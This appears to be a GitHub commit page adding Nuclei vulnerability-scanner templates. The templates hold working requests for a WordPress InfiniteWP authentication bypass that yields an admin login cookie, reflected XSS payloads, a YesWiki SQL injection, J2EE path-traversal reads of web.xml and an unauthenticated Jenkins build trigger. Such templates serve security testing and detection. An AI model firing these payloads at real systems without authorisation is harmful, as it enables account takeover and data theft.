-
Notifications
You must be signed in to change notification settings - Fork 643
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
14 changed files
with
551 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,74 @@ | ||
id: CVE-2020-8772 | ||
|
||
info: | ||
name: WordPress InfiniteWP Client < 1.9.4.5 - Authentication Bypass | ||
author: princechaddha,scent2d | ||
severity: critical | ||
description: | | ||
The InfiniteWP Client plugin before 1.9.4.5 for WordPress has a missing | ||
authorization check in iwp_mmb_set_request in init.php. Any attacker who | ||
knows the username of an administrator can log in. | ||
reference: | ||
- https://wpscan.com/vulnerability/10011 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772 | ||
- https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ | ||
- https://wpvulndb.com/vulnerabilities/10011 | ||
remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher. | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2020-8772 | ||
cwe-id: CWE-862 | ||
metadata: | ||
verified: "true" | ||
tags: cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /?author=1 HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
Accept-Language: en-US,en;q=0.9 | ||
- | | ||
POST / HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | ||
Content-Type: application/x-www-form-urlencoded | ||
_IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} | ||
redirects: true | ||
extractors: | ||
- type: regex | ||
name: username | ||
internal: true | ||
group: 1 | ||
part: body | ||
regex: | ||
- 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' | ||
|
||
- type: regex | ||
name: username | ||
internal: true | ||
group: 1 | ||
part: header | ||
regex: | ||
- 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: header | ||
words: | ||
- "wordpress_logged_in" | ||
|
||
- type: word | ||
words: | ||
- "<IWPHEADER>" | ||
|
||
part: body | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,44 @@ | ||
id: CVE-2021-45422 | ||
|
||
info: | ||
name: Reprise License Manager 14.2 - Reflected XSS | ||
author: edoardottt | ||
severity: medium | ||
description: | | ||
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. No authentication is required. | ||
reference: | ||
- https://seclists.org/fulldisclosure/2022/Jan/31 | ||
- https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-45422 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2021-45422 | ||
cwe-id: CWE-79 | ||
metadata: | ||
shodan-query: http.html:"Reprise License" | ||
verified: "true" | ||
tags: cve,cve2021,reprise,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- 'value=""><script>alert(document.domain)</script>"><input type=' | ||
- 'value: "><script>alert(document.domain)</script>)<br>' | ||
condition: or | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- "text/html" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
id: CVE-2022-35493 | ||
|
||
info: | ||
name: eShop - Cross-site Scripting | ||
author: arafatansari | ||
severity: medium | ||
description: | | ||
eShop - Multipurpose Ecommerce Store Website v3.0.4 allows Reflected Cross-site scripting vulnerability in json search parse and the json response in wrteam.in. | ||
reference: | ||
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493 | ||
metadata: | ||
verified: true | ||
shodan-query: http.html:"eShop - Multipurpose Ecommerce" | ||
tags: cve,cve2022,eshop,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- 'Search Result for \"><img src=x onerror=alert(document.domain)>' | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2022-36883 | ||
info: | ||
name: Git Plugin up to 4.11.3 on Jenkins Build Authorization | ||
author: c-sh0 | ||
severity: high | ||
description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. | ||
reference: | ||
- https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-36883 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2022-36883 | ||
cwe-id: CWE-862 | ||
metadata: | ||
shodan-query: X-Jenkins | ||
verified: "true" | ||
tags: cve,cve2022,jenkins,plugin,git | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "repository:" | ||
- "SCM API plugin" | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 |
25 changes: 25 additions & 0 deletions
25
config/nuclei-templates/exposed-panels/mybb-forum-detect.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
id: mybb-forum-detect | ||
|
||
info: | ||
name: MyBB Forum Panel Detect | ||
author: ritikchaddha | ||
severity: info | ||
metadata: | ||
verified: true | ||
shodan-query: http.title:"MyBB" | ||
tags: panel,mybb,forum | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/portal.php' | ||
|
||
redirects: true | ||
max-redirects: 2 | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- 'MyBB Forum' | ||
- '<title>MyBB' | ||
condition: or |
34 changes: 34 additions & 0 deletions
34
config/nuclei-templates/exposed-panels/mybb/mybb-forum-install.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
id: mybb-forum-install | ||
|
||
info: | ||
name: MyBB Exposed Installation | ||
author: ritikchaddha | ||
severity: high | ||
metadata: | ||
verified: true | ||
shodan-query: http.title:"MyBB" | ||
tags: panel,mybb,forum | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/install/index.php' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- 'MyBB' | ||
- 'Installation Wizard' | ||
condition: and | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- 'currently locked' | ||
negative: true | ||
|
||
- type: status | ||
status: | ||
- 200 |
26 changes: 26 additions & 0 deletions
26
config/nuclei-templates/exposed-panels/wordpress/wp-install.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
id: wp-install | ||
|
||
info: | ||
name: WordPress Exposed Installation | ||
author: princechaddha | ||
severity: high | ||
reference: | ||
- https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ | ||
tags: panel,wordpress | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-admin/install.php" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<title>WordPress › Installation</title>" | ||
- "Site Title" | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: yeswiki-detect | ||
|
||
info: | ||
name: YesWiki Detect | ||
author: ritikchaddha | ||
severity: info | ||
metadata: | ||
verified: true | ||
shodan-query: http.html:"yeswiki" | ||
tags: yeswiki,panel | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}' | ||
|
||
redirects: true | ||
max-redirects: 2 | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- 'yeswiki-search' | ||
- 'yeswiki-base' | ||
condition: or | ||
|
||
- type: status | ||
status: | ||
- 200 |
44 changes: 44 additions & 0 deletions
44
config/nuclei-templates/vulnerabilities/generic/generic-j2ee-lfi.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,44 @@ | ||
id: generic-j2ee-lfi | ||
|
||
info: | ||
name: Generic J2EE LFI scan | ||
author: davidfegyver | ||
severity: high | ||
description: Looks for J2EE specific LFI vulnerabilities, tries to leak the web.xml file. | ||
reference: | ||
- https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java | ||
metadata: | ||
verified: true | ||
shodan-query: http.title:"J2EE" | ||
tags: lfi,generic,j2ee | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/../../../../WEB-INF/web.xml" | ||
- "{{BaseURL}}/../../../WEB-INF/web.xml" | ||
- "{{BaseURL}}/../../WEB-INF/web.xml" | ||
- "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml" | ||
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml" | ||
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml" | ||
- "{{BaseURL}}/../../../WEB-INF/web.xml;x=" | ||
- "{{BaseURL}}/../../WEB-INF/web.xml;x=" | ||
- "{{BaseURL}}/../WEB-INF/web.xml;x=" | ||
- "{{BaseURL}}/WEB-INF/web.xml" | ||
- "{{BaseURL}}/.//WEB-INF/web.xml" | ||
- "{{BaseURL}}/../WEB-INF/web.xml" | ||
- "{{BaseURL}}/%c0%ae/WEB-INF/web.xml" | ||
|
||
stop-at-first-match: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "<servlet-name>" | ||
- "</web-app>" | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 |
33 changes: 33 additions & 0 deletions
33
config/nuclei-templates/vulnerabilities/other/yeswiki-sql.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: yeswiki-sql | ||
|
||
info: | ||
name: YesWiki - SQL Injection | ||
author: arafatansari | ||
severity: critical | ||
description: | | ||
YesWiki before 2022-07-07 allows SQL Injection via the "id" parameter in the AccueiL URL. | ||
reference: | ||
- https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985/ | ||
metadata: | ||
verified: true | ||
shodan-query: http.html:"yeswiki" | ||
tags: yeswiki,sqli | ||
|
||
variables: | ||
num: "999999999" | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- 'c8c605999f3d8352d7bb792cf3f' | ||
|
||
- type: status | ||
status: | ||
- 200 |
Oops, something went wrong.